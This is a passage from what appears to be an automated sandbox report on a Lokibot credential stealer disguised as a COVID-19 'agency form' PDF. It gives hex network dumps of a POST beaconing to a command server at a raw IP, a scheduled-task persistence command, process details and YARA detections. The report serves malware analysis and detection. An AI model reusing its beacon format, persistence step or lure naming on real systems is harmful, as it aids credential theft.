76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.34972163.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:36.486135960 CEST1415OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:37.338311911 CEST1424INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:36 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:14:36:18
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                                        Imagebase:0x2d0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                                        Imagebase:0x1340000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:36:28
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Imagebase:0x7a0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Disassembly

                                        Code Analysis

                                        Reset < >